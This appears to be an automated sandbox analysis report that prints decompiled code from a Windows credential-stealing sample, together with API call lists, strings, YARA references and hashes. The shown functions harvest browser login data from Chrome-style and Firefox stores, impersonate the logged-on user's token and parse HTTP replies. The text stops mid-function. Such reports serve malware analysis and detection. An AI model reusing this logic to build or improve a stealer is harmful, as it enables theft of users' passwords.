                                                                        • ImpersonateLoggedOnUser.ADVAPI32(00410C2C), ref: 00402D0A
                                                                        • RegOpenCurrentUser.ADVAPI32(000F003F,00000000), ref: 00402D2B
                                                                        • CloseHandle.KERNEL32(00410C2C), ref: 00402D5C
                                                                        • CloseHandle.KERNEL32(00410B93,00410C2C), ref: 00402D64
                                                                        • CloseHandle.KERNEL32(00410B93), ref: 00402D6E
                                                                        • Process32Next.KERNEL32 ref: 00402D80
                                                                        • CloseHandle.KERNEL32(?,?,00000128,00000002,00000000), ref: 00402D90
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseHandle$OpenProcess$User$CurrentImpersonateLoggedNextProcess32SessionToken
                                                                        • String ID: explorer.exe
                                                                        • API String ID: 3144406365-3187896405
                                                                        • Opcode ID: aef6317e5045ecaeae95ce1e29d41b5616d0a15dd4b1757b2ee98fb37c85f866
                                                                        • Instruction ID: b299d969079444cf023299e81dd2094d9188d3462d9269bcd78f4557cfd88060
                                                                        • Opcode Fuzzy Hash: aef6317e5045ecaeae95ce1e29d41b5616d0a15dd4b1757b2ee98fb37c85f866
                                                                        • Instruction Fuzzy Hash: C7213A72A00518EBDF229B61DD4ABED7A74AF04304F1440B6A104B51E1E7BC9E91DF59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 67%
                                                                        			E0040BA2E(void* __eax, intOrPtr _a8, intOrPtr _a12, void* _a16, intOrPtr _a20) {
                                                                        				char _v8;
                                                                        				char _v12;
                                                                        				char _v16;
                                                                        				char _v20;
                                                                        				char _v24;
                                                                        				char _v28;
                                                                        				char _v32;
                                                                        				char _v36;
                                                                        				void* _v40;
                                                                        				void* _v44;
                                                                        				char _v48;
                                                                        				void* _v52;
                                                                        				int _v56;
                                                                        				char* _v60;
                                                                        				void* _t55;
                                                                        				void* _t56;
                                                                        				int _t77;
                                                                        				int _t78;
                                                                        
                                                                        				_t55 = __eax;
                                                                        				if(_a16 == 0 ||  *0x41442d == 0) {
                                                                        					return _t55;
                                                                        				} else {
                                                                        					_t56 = _a16;
                                                                        					if( *0x41914c < _t56 &&  *0x419150 < _t56 &&  *0x419154 < _t56) {
                                                                        						E0040B1AB(_a12,  *0x41914c,  &_v8,  &_v12,  &_v16);
                                                                        						E0040B1AB(_a12,  *0x419154,  &_v20,  &_v24,  &_v28);
                                                                        						E0040B1AB(_a12,  *0x419150,  &_v32,  &_v36,  &_v40);
                                                                        						_push(_v32);
                                                                        						_pop( *_t16);
                                                                        						_push(_v40);
                                                                        						_pop( *_t18);
                                                                        						_v52 = 0;
                                                                        						_t56 =  *0x41442d( &_v48, 0, 0, 0, 0, 1,  &_v56);
                                                                        						if(_t56 != 0 && _v52 != 0 && _v56 <= _v32) {
                                                                        							asm("cld");
                                                                        							asm("jecxz 0x4");
                                                                        							memcpy(_v40, _v52, _v56);
                                                                        							_push(_v56);
                                                                        							_pop( *_t29);
                                                                        							_t56 = LocalFree(_v52);
                                                                        							if(_v8 != 0 && _v20 != 0 && _v32 != 0) {
                                                                        								_v60 = E004017EC(_v8);
                                                                        								E00401823(_v16, _v60, _v8);
                                                                        								_t77 = StrCmpNIA(_v60, "ftp://", lstrlenA("ftp://"));
                                                                        								if(_t77 != 0) {
                                                                        									_t77 = StrCmpNIA(_v60, "http://", lstrlenA("http://"));
                                                                        								}
                                                                        								_t78 = _t77;
                                                                        								if(_t78 != 0) {
                                                                        									_t78 = StrCmpNIA(_v60, "https://", lstrlenA("https://"));
                                                                        								}
                                                                        								if(_t78 == 0) {
                                                                        									E00401486(_a8, _a20);
                                                                        									E00401486(_a8,  *0x419148);
                                                                        									E004014BC(_a8, _v16, _v8);
                                                                        									E004014BC(_a8, _v28, _v20);
                                                                        									E004014BC(_a8, _v40, _v32);
                                                                        								}
                                                                        								return E004017D5(_v60);
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					return _t56;
                                                                        				}
                                                                        			}






















                                                                        APIs
                                                                        • LocalFree.KERNEL32(00000000,?), ref: 0040BB20
                                                                        • lstrlenA.KERNEL32(ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BB61
                                                                        • StrCmpNIA.SHLWAPI(?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BB6F
                                                                        • lstrlenA.KERNEL32(http://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BB7D
                                                                        • StrCmpNIA.SHLWAPI(?,http://,00000000,http://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BB8B
                                                                        • lstrlenA.KERNEL32(https://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BB99
                                                                        • StrCmpNIA.SHLWAPI(?,https://,00000000,https://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BBA7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: lstrlen$FreeLocal
                                                                        • String ID: ftp://$http://$https://
                                                                        • API String ID: 1884169789-2804853444
                                                                        • Opcode ID: 95c9bc2d148bde0b4b59229255769488340ea3422c61917c09e4e27456b1ab44
                                                                        • Instruction ID: bf0502dff25623896b3ecf7b6da0d74d92ec6f4b9260b97e51de09929ef1935b
                                                                        • Opcode Fuzzy Hash: 95c9bc2d148bde0b4b59229255769488340ea3422c61917c09e4e27456b1ab44
                                                                        • Instruction Fuzzy Hash: 9E51E772900209FBDF12AF91ED45EEE7B7AEB48314F108136F510B11A1D7799A90EB98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 67%
                                                                        			E0040B973(CHAR* _a4, intOrPtr _a8) {
                                                                        				char* _t14;
                                                                        				int _t17;
                                                                        				int _t20;
                                                                        				CHAR* _t29;
                                                                        
                                                                        				E0040282C(_a4);
                                                                        				_t14 = StrStrIA(_a4, 0x415c5b);
                                                                        				if(_t14 != 0) {
                                                                        					 *_t14 = 0;
                                                                        					E0040282C(_a4);
                                                                        					_t29 = "CONSTRAINT";
                                                                        					while(1) {
                                                                        						_t17 = lstrcmpiA(_t29, _a4);
                                                                        						if(_t17 == 0) {
                                                                        							break;
                                                                        						}
                                                                        						asm("cld");
                                                                        						asm("repne scasb");
                                                                        						if( *_t29 != 0) {
                                                                        							continue;
                                                                        						} else {
                                                                        							_t20 = lstrlenA(_a4);
                                                                        							if(_t20 != 0) {
                                                                        								if(lstrcmpiA(_a4, "origin_url") == 0) {
                                                                        									_push(_a8);
                                                                        									_pop( *0x41914c);
                                                                        								}
                                                                        								if(lstrcmpiA(_a4, "password_value") == 0) {
                                                                        									_push(_a8);
                                                                        									_pop( *0x419150);
                                                                        								}
                                                                        								if(lstrcmpiA(_a4, "username_value") == 0) {
                                                                        									_push(_a8);
                                                                        									_pop( *0x419154);
                                                                        								}
                                                                        								return 1;
                                                                        							} else {
                                                                        								return _t20;
                                                                        							}
                                                                        						}
                                                                        						goto L15;
                                                                        					}
                                                                        					return _t17;
                                                                        				} else {
                                                                        					return _t14;
                                                                        				}
                                                                        				L15:
                                                                        			}








                                                                        APIs
                                                                          • Part of subcall function 0040282C: lstrlenA.KERNEL32(?), ref: 00402860
                                                                        • StrStrIA.SHLWAPI(?,00415C5B), ref: 0040B987
                                                                        • lstrcmpiA.KERNEL32(CONSTRAINT,?,?,00415C5B), ref: 0040B9A9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: lstrcmpilstrlen
                                                                        • String ID: CONSTRAINT$origin_url$password_value$username_value
                                                                        • API String ID: 3649823140-2401479949
                                                                        • Opcode ID: 511362c122ae1bb3d44918b29f558ac21b14b782be5ce1ccac998998cca95872
                                                                        • Instruction ID: d1a5d0e1c88d5ff09c1e1cca62af422fdfc66f56267979ae8e6772905978206e
                                                                        • Opcode Fuzzy Hash: 511362c122ae1bb3d44918b29f558ac21b14b782be5ce1ccac998998cca95872
                                                                        • Instruction Fuzzy Hash: D7118677210505F9CF522F65DC02ADE3E51EB66398B008137F519A81A1E3BDCDD1968C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 67%
                                                                        			E0040BE43(CHAR* _a4, intOrPtr _a8) {
                                                                        				char* _t14;
                                                                        				int _t17;
                                                                        				int _t20;
                                                                        				CHAR* _t29;
                                                                        
                                                                        				E0040282C(_a4);
                                                                        				_t14 = StrStrIA(_a4, 0x415c5b);
                                                                        				if(_t14 != 0) {
                                                                        					 *_t14 = 0;
                                                                        					E0040282C(_a4);
                                                                        					_t29 = "CONSTRAINT";
                                                                        					while(1) {
                                                                        						_t17 = lstrcmpiA(_t29, _a4);
                                                                        						if(_t17 == 0) {
                                                                        							break;
                                                                        						}
                                                                        						asm("cld");
                                                                        						asm("repne scasb");
                                                                        						if( *_t29 != 0) {
                                                                        							continue;
                                                                        						} else {
                                                                        							_t20 = lstrlenA(_a4);
                                                                        							if(_t20 != 0) {
                                                                        								if(lstrcmpiA(_a4, "hostname") == 0) {
                                                                        									_push(_a8);
                                                                        									_pop( *0x419158);
                                                                        								}
                                                                        								if(lstrcmpiA(_a4, "encryptedPassword") == 0) {
                                                                        									_push(_a8);
                                                                        									_pop( *0x41915c);
                                                                        								}
                                                                        								if(lstrcmpiA(_a4, "encryptedUsername") == 0) {
                                                                        									_push(_a8);
                                                                        									_pop( *0x419160);
                                                                        								}
                                                                        								return 1;
                                                                        							} else {
                                                                        								return _t20;
                                                                        							}
                                                                        						}
                                                                        						goto L15;
                                                                        					}
                                                                        					return _t17;
                                                                        				} else {
                                                                        					return _t14;
                                                                        				}
                                                                        				L15:
                                                                        			}








                                                                        APIs
                                                                          • Part of subcall function 0040282C: lstrlenA.KERNEL32(?), ref: 00402860
                                                                        • StrStrIA.SHLWAPI(?,00415C5B), ref: 0040BE57
                                                                        • lstrcmpiA.KERNEL32(CONSTRAINT,?,?,00415C5B), ref: 0040BE79
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: lstrcmpilstrlen
                                                                        • String ID: CONSTRAINT$encryptedPassword$encryptedUsername$hostname
                                                                        • API String ID: 3649823140-2971371156
                                                                        • Opcode ID: 3b6e553b86d3743abcf43c6fed1d443a023b2c038be3cf22ddb1bdf73287225e
                                                                        • Instruction ID: c71311dfb796d292e15c99594d8fb0fbbefb30d41f24959de37fc513c87e5bbe
                                                                        • Opcode Fuzzy Hash: 3b6e553b86d3743abcf43c6fed1d443a023b2c038be3cf22ddb1bdf73287225e
                                                                        • Instruction Fuzzy Hash: 8A116077210505F6CF122F65EC02ACF3E51EB66398B008137F919A81A1E3BD8DD196CC
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 44%
                                                                        			E0041098D(signed int __eax, void* __ecx, signed int __edx) {
                                                                        				void* _v8;
                                                                        				char* _v12;
                                                                        				CHAR* _v16;
                                                                        				CHAR* _v20;
                                                                        				CHAR* _v24;
                                                                        				CHAR* _v28;
                                                                        				void* _v32;
                                                                        				void* _v36;
                                                                        				CHAR* _v40;
                                                                        				char _v44;
                                                                        				CHAR* _v48;
                                                                        				CHAR* _t46;
                                                                        				int _t50;
                                                                        				CHAR* _t54;
                                                                        				CHAR* _t57;
                                                                        				CHAR* _t59;
                                                                        				CHAR* _t65;
                                                                        				int _t68;
                                                                        				CHAR* _t69;
                                                                        				CHAR* _t70;
                                                                        				void* _t71;
                                                                        				signed int _t73;
                                                                        				signed int _t74;
                                                                        				char* _t75;
                                                                        
                                                                        				_t71 = __ecx;
                                                                        				_t73 = __edx ^ __eax;
                                                                        				_t42 = __eax ^ _t73;
                                                                        				_t74 = _t73 ^ __eax ^ _t73;
                                                                        				if( *0x414411 == 0 ||  *0x41441d == 0) {
                                                                        					return 0;
                                                                        				} else {
                                                                        					_t69 =  *0x417691; // 0x0
                                                                        					while(1) {
                                                                        						_t70 = _t69;
                                                                        						__eflags = _t70;
                                                                        						if(_t70 == 0) {
                                                                        							break;
                                                                        						}
                                                                        						E00402AF8(_t42, _t74);
                                                                        						__eflags =  *0x417695;
                                                                        						if( *0x417695 == 0) {
                                                                        							L7:
                                                                        							_v8 = 0;
                                                                        							_t46 =  *0x41441d(_t70[4], 0, _t70[4], 2, 0,  &_v8);
                                                                        							__eflags = _t46;
                                                                        							if(_t46 == 0) {
                                                                        								_v12 = E0040294B(_t70[4]);
                                                                        								_t50 = LCMapStringA(0x400, 0x100, _t70[4], lstrlenA(_t70[4]), _v12, _t49);
                                                                        								__eflags = _t50;
                                                                        								if(_t50 == 0) {
                                                                        									L12:
                                                                        									E004017D5(_v12);
                                                                        									_t75 = "r`l`oui`";
                                                                        									L13:
                                                                        									_v8 = 0;
                                                                        									_t54 =  *0x41441d(_t70[4], 0, _t75, 2, 0,  &_v8);
                                                                        									__eflags = _t54;
                                                                        									if(_t54 != 0) {
                                                                        										goto L14;
                                                                        									}
                                                                        								} else {
                                                                        									_v8 = 0;
                                                                        									_t65 =  *0x41441d(_t70[4], 0, _v12, 2, 0,  &_v8);
                                                                        									__eflags = _t65;
                                                                        									if(_t65 == 0) {
                                                                        										goto L12;
                                                                        									} else {
                                                                        										E004017D5(_v12);
                                                                        										goto L14;
                                                                        									}
                                                                        								}
                                                                        							} else {
                                                                        								L14:
                                                                        								_v44 = 0x20;
                                                                        								_v40 = 1;
                                                                        								_push(_t70[4]);
                                                                        								_pop( *_t23);
                                                                        								_push(_t70[8]);
                                                                        								_pop( *_t25);
                                                                        								_v28 = 0;
                                                                        								_v24 = 0;
                                                                        								_v20 = 0;
                                                                        								_v16 = 0;
                                                                        								_t57 =  &_v44;
                                                                        								_push(_t57);
                                                                        								_push(_v8);
                                                                        								L00410E96();
                                                                        								__eflags = _t57;
                                                                        								if(_t57 == 0) {
                                                                        									_v48 = 0;
                                                                        								} else {
                                                                        									__eflags = _v16;
                                                                        									if(_v16 != 0) {
                                                                        										_push(_v16);
                                                                        										_pop( *0x4140fe);
                                                                        									}
                                                                        									_v48 = 1;
                                                                        								}
                                                                        								_t59 =  *0x414411(_v8);
                                                                        								_t60 = _t59;
                                                                        								__eflags = _t59;
                                                                        								if(__eflags != 0) {
                                                                        									E004105CE(_t60, _t71, _t74, __eflags);
                                                                        									__eflags =  *0x414409;
                                                                        									if( *0x414409 != 0) {
                                                                        										 *0x414409();
                                                                        									}
                                                                        									 *0x4140fe = 0x80000001;
                                                                        								}
                                                                        								__eflags = _v48;
                                                                        								if(_v48 != 0) {
                                                                        									_push(_v16);
                                                                        									_push(_v8);
                                                                        									L00410E9C();
                                                                        								}
                                                                        								CloseHandle(_v8);
                                                                        							}
                                                                        							asm("cld");
                                                                        							_t42 = 0;
                                                                        							_t71 = 0xffffffff;
                                                                        							asm("repne scasb");
                                                                        							__eflags =  *_t75;
                                                                        							if( *_t75 != 0) {
                                                                        								goto L13;
                                                                        							}
                                                                        						} else {
                                                                        							_t68 = lstrcmpiA( *0x417695, _t70[4]);
                                                                        							_t42 = _t68;
                                                                        							__eflags = _t68;
                                                                        							if(_t68 != 0) {
                                                                        								goto L7;
                                                                        							} else {
                                                                        							}
                                                                        						}
                                                                        						_t69 =  *_t70;
                                                                        					}
                                                                        					return 1;
                                                                        				}
                                                                        			}




























                                                                        APIs
                                                                        • lstrcmpiA.KERNEL32(?), ref: 004109D5
                                                                        • lstrlenA.KERNEL32(?,?), ref: 00410A17
                                                                        • LCMapStringA.KERNEL32(00000400,00000100,?,00000000,?,00000000,?,?), ref: 00410A2E
                                                                        • LoadUserProfileA.USERENV(00000000,00000020,?,?), ref: 00410ACF
                                                                        • UnloadUserProfile.USERENV(00000000,00000000), ref: 00410B2E
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00410B36
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ProfileUser$CloseHandleLoadStringUnloadlstrcmpilstrlen
                                                                        • String ID: $r`l`oui`
                                                                        • API String ID: 1092964125-956245557
                                                                        • Opcode ID: e8c680e9c729fbd071ccc07f1bc87b888f040c63c80d600780040c0011251876
                                                                        • Instruction ID: 97e36a9f464fd7594aaf26f4fe361f5543e1ef418d0b81fc890e2415056c999a
                                                                        • Opcode Fuzzy Hash: e8c680e9c729fbd071ccc07f1bc87b888f040c63c80d600780040c0011251876
                                                                        • Instruction Fuzzy Hash: 54516E71A00208EFEF119FA1DD46BDEBA75EB04318F14C066E510A91E2D7F99AD0DF29
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 87%
                                                                        			E00409713(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                        				CHAR* _v8;
                                                                        				CHAR* _v12;
                                                                        				intOrPtr _v16;
                                                                        				CHAR* _v20;
                                                                        				void* _t33;
                                                                        				void* _t35;
                                                                        				intOrPtr _t38;
                                                                        				char* _t57;
                                                                        				char* _t61;
                                                                        				char* _t62;
                                                                        				CHAR* _t63;
                                                                        
                                                                        				_t33 = E00401E9C(_a8);
                                                                        				if(_t33 != 0) {
                                                                        					_t35 = E00401E9C(_a12);
                                                                        					if(_t35 != 0) {
                                                                        						if(E004024D7(_a8) != 0) {
                                                                        							_t38 = E00401D15(_a8, 0);
                                                                        						} else {
                                                                        							_t38 = E00401D15(_a8, "\\");
                                                                        						}
                                                                        						_v16 = _t38;
                                                                        						_v12 = E00401D15(_v16, "profiles.ini");
                                                                        						_v8 = E004017EC(0xfdea);
                                                                        						_v20 = E004017EC(0x1000);
                                                                        						if(E00401E53(_v12) != 0 && GetPrivateProfileSectionNamesA(_v8, 0xfde8, _v12) > 2) {
                                                                        							_t63 = _v8;
                                                                        							if( *_t63 != 0) {
                                                                        								do {
                                                                        									if(StrStrIA(_t63, "Profile") != 0 && GetPrivateProfileStringA(_t63, "Path", 0x4140dc, _v20, 0xfff, _v12) != 0) {
                                                                        										if(GetPrivateProfileIntA(_t63, "IsRelative", 1, _v12) != 1) {
                                                                        											E004096FB(_a4, _v20, _a12);
                                                                        										} else {
                                                                        											_t57 = E00401D15(_v16, _v20);
                                                                        											_push(_t57);
                                                                        											_t61 = _t57;
                                                                        											while(1) {
                                                                        												_t62 = _t61;
                                                                        												if(_t62 == 0 ||  *_t62 == 0) {
                                                                        													break;
                                                                        												}
                                                                        												if( *_t62 == 0x2f) {
                                                                        													 *_t62 = 0x5c;
                                                                        												}
                                                                        												_t61 = _t62 + 1;
                                                                        											}
                                                                        											E004096FB(_a4, _t57, _a12);
                                                                        											E004017D5();
                                                                        										}
                                                                        									}
                                                                        									asm("cld");
                                                                        									asm("repne scasb");
                                                                        								} while ( *_t63 != 0);
                                                                        							}
                                                                        						}
                                                                        						E004017D5(_v16);
                                                                        						E004017D5(_v20);
                                                                        						E004017D5(_v12);
                                                                        						E004017D5(_v8);
                                                                        						return E004096FB(_a4, _a8, _a12);
                                                                        					} else {
                                                                        						return _t35;
                                                                        					}
                                                                        				} else {
                                                                        					return _t33;
                                                                        				}
                                                                        			}















                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: IsRelative$Path$Profile$profiles.ini
                                                                        • API String ID: 0-4107377610
                                                                        • Opcode ID: d5eb002496591747a9483898efa8975ea6d74f7974628be87dc4108a6ce88e32
                                                                        • Instruction ID: 9f854c8f064d301336fa07c1f25567edbfe6f4ad31a08e24bdafbc402817c31b
                                                                        • Opcode Fuzzy Hash: d5eb002496591747a9483898efa8975ea6d74f7974628be87dc4108a6ce88e32
                                                                        • Instruction Fuzzy Hash: 4B413D72910109BACF223FA1DC42AAE7B72AF55714F24817BF511751F3D77D4DA0AA08
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 75%
                                                                        			E004039C1(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, char** _a12) {
                                                                        				char* _v8;
                                                                        				int _v12;
                                                                        				char*** _v16;
                                                                        				char* _t47;
                                                                        				char* _t48;
                                                                        				char* _t49;
                                                                        				char* _t50;
                                                                        				void* _t54;
                                                                        				void* _t66;
                                                                        				char* _t81;
                                                                        				char* _t82;
                                                                        				void* _t83;
                                                                        				char* _t86;
                                                                        				char* _t87;
                                                                        				void* _t88;
                                                                        
                                                                        				_t72 = __edx;
                                                                        				_v8 = E004017EC(0x7d00);
                                                                        				E00401000( &_v16, __edx,  &_v16);
                                                                        				_t66 = 0;
                                                                        				while(E00403879(_a4, _v16, 0xfa00, 0xa) != 0 && E0040106A(_t39, _t72, _v16) <= 0xfa00) {
                                                                        					if(E00403973(_t72, _v16) == 0) {
                                                                        						continue;
                                                                        					}
                                                                        					E00401273(_t44, _t72, _v16);
                                                                        					_t76 =  *_v16;
                                                                        					( *_v16)[3](_v16, _v8, 0x2134, 0);
                                                                        					_v12 = 0;
                                                                        					_t47 = StrStrIA(_v8, "Content-Length:");
                                                                        					_push(_t66);
                                                                        					_t48 = _t47;
                                                                        					if(_t48 != 0) {
                                                                        						_t86 =  &(_t48[lstrlenA("Content-Length:")]);
                                                                        						_push(_t86);
                                                                        						_t87 =  &(_t86[1]);
                                                                        						asm("repne scasb");
                                                                        						 *((char*)(_t87 - 1)) = 0;
                                                                        						_v12 = StrToIntA(_t87);
                                                                        						_t88 = _t87;
                                                                        						 *((char*)(_t88 - 1)) = 0xd;
                                                                        					}
                                                                        					_pop(_t67);
                                                                        					_t49 = StrStrIA(_v8, "Location:");
                                                                        					_t50 = _t49;
                                                                        					if(_t50 != 0) {
                                                                        						_t81 =  &(_t50[lstrlenA("Location:")]);
                                                                        						_push(_t81);
                                                                        						_t82 =  &(_t81[1]);
                                                                        						asm("repne scasb");
                                                                        						 *((char*)(_t82 - 1)) = 0;
                                                                        						_push(_t82);
                                                                        						_t50 = E0040294B(_t82);
                                                                        						_t76 = _a12;
                                                                        						if(_t76 == 0) {
                                                                        							_t50 = E004017D5(_t50);
                                                                        						} else {
                                                                        							 *_t76 = _t50;
                                                                        						}
                                                                        						_pop(_t83);
                                                                        						 *((char*)(_t83 - 1)) = 0xd;
                                                                        					}
                                                                        					_pop(_t66);
                                                                        					E004012C7(_t50, _t76, _v16);
                                                                        					if(_v12 <= 0) {
                                                                        						_v12 = 0xa00000;
                                                                        					}
                                                                        					_t54 = E0040106A(E004038EB(_a4, _v16, _v12), _t76, _v16);
                                                                        					if(_t54 != 0) {
                                                                        						if(_t54 != 0) {
                                                                        							_push(_a8);
                                                                        							_push(_v16);
                                                                        							if(( *_v16)[0xd]() >= 0) {
                                                                        								_t66 = 1;
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					break;
                                                                        				}
                                                                        				( *_v16)[2](_v16);
                                                                        				E004017D5(_v8);
                                                                        				return _t66;
                                                                        			}

                                                                        APIs
                                                                          • Part of subcall function 004017EC: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BA6,00000000), ref: 004017FA
                                                                          • Part of subcall function 00401000: CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,0040202B,?,?,?,?,00410BE4), ref: 00401010
                                                                        • StrStrIA.SHLWAPI(?,Content-Length:), ref: 00403A47
                                                                        • lstrlenA.KERNEL32(Content-Length:,00000000,?,Content-Length:), ref: 00403A58
                                                                        • StrToIntA.SHLWAPI(00000001,00000001,00000000,Content-Length:,00000000,?,Content-Length:), ref: 00403A79
                                                                        • StrStrIA.SHLWAPI(?,Location:,?,Content-Length:), ref: 00403A90
                                                                        • lstrlenA.KERNEL32(Location:,00000000,?,Location:,?,Content-Length:), ref: 00403AA1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: lstrlen$AllocCreateGlobalLocalStream
                                                                        • String ID: Content-Length:$Location:
                                                                        • API String ID: 470334641-2400408565
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 75%
                                                                        			E0040424A() {
                                                                        				char _v8;
                                                                        				struct HINSTANCE__* _t4;
                                                                        				intOrPtr* _t10;
                                                                        				struct HINSTANCE__* _t15;
                                                                        
                                                                        				_t4 = GetModuleHandleA("kernel32.dll");
                                                                        				_t15 = _t4;
                                                                        				_v8 = 0;
                                                                        				if(_t4 == 0 || GetProcAddress(_t15, "GetNativeSystemInfo") == 0) {
                                                                        					L5:
                                                                        					return 0;
                                                                        				} else {
                                                                        					_t10 = GetProcAddress(_t15, "IsWow64Process");
                                                                        					if(_t10 == 0) {
                                                                        						goto L5;
                                                                        					} else {
                                                                        						 *_t10(GetCurrentProcess(),  &_v8);
                                                                        						if(_v8 == 0) {
                                                                        							goto L5;
                                                                        						} else {
                                                                        							return 1;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00404258
                                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00404270
                                                                        • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00404281
                                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,IsWow64Process,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00404290
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AddressProc$CurrentHandleModuleProcess
                                                                        • String ID: GetNativeSystemInfo$IsWow64Process$kernel32.dll
                                                                        • API String ID: 977827838-3073145729
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040D8B9(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                        				intOrPtr _v8;
                                                                        				intOrPtr _v12;
                                                                        				char _v20;
                                                                        				char* _v24;
                                                                        				char* _v28;
                                                                        				char* _v32;
                                                                        				char _v33;
                                                                        				char* _v40;
                                                                        				char* _v44;
                                                                        				char _v45;
                                                                        				void* _t28;
                                                                        				intOrPtr* _t31;
                                                                        				intOrPtr* _t35;
                                                                        				void* _t38;
                                                                        				intOrPtr* _t40;
                                                                        				void* _t43;
                                                                        				void* _t52;
                                                                        				char* _t57;
                                                                        				char* _t59;
                                                                        
                                                                        				_t52 = __ecx;
                                                                        				_t28 = E00401E53(_a8);
                                                                        				if(_t28 != 0) {
                                                                        					_t31 = E00401F1B(__eflags, _a8,  &_v20);
                                                                        					__eflags = _t31;
                                                                        					if(_t31 != 0) {
                                                                        						_v24 = E004017EC(_v8);
                                                                        						E00401823(_v12, _v24, _v8);
                                                                        						_t57 = _v24;
                                                                        						while(1) {
                                                                        							__eflags =  *_t57;
                                                                        							if( *_t57 == 0) {
                                                                        								break;
                                                                        							}
                                                                        							_t35 = StrStrA(_t57, "<setting name=\"");
                                                                        							__eflags = _t35;
                                                                        							if(_t35 != 0) {
                                                                        								_t59 = _t35 + lstrlenA("<setting name=\"");
                                                                        								_v28 = _t59;
                                                                        								_t38 = StrStrA(_t59, 0x4160dc);
                                                                        								__eflags = _t38;
                                                                        								if(_t38 != 0) {
                                                                        									_v33 =  *_t38;
                                                                        									_v32 = _t38;
                                                                        									_t40 = StrStrA(_t59, "value=\"");
                                                                        									__eflags = _t40;
                                                                        									if(_t40 != 0) {
                                                                        										_t57 = _t40 + lstrlenA("value=\"");
                                                                        										_v40 = _t57;
                                                                        										_t43 = StrStrA(_t57, 0x4160dc);
                                                                        										__eflags = _t43;
                                                                        										if(_t43 != 0) {
                                                                        											_v45 =  *_t43;
                                                                        											_v44 = _t43;
                                                                        											 *_v32 = 0;
                                                                        											 *_v44 = 0;
                                                                        											E0040D82C(_t52, _a4, _v28, _v40);
                                                                        											 *_v32 = _v33;
                                                                        											 *_v44 = _v45;
                                                                        											continue;
                                                                        										}
                                                                        										break;
                                                                        									}
                                                                        									break;
                                                                        								}
                                                                        								break;
                                                                        							}
                                                                        							break;
                                                                        						}
                                                                        						E004017D5(_v24);
                                                                        						return E00401FB0( &_v20);
                                                                        					}
                                                                        					return _t31;
                                                                        				} else {
                                                                        					return _t28;
                                                                        				}
                                                                        			}

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: <setting name="$value="
                                                                        • API String ID: 0-3468128162
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00401F1B(void* __eflags, CHAR* _a4, void** _a8) {
                                                                        				void* _t11;
                                                                        				void* _t12;
                                                                        				void* _t18;
                                                                        				void* _t20;
                                                                        				void** _t24;
                                                                        
                                                                        				_t24 = _a8;
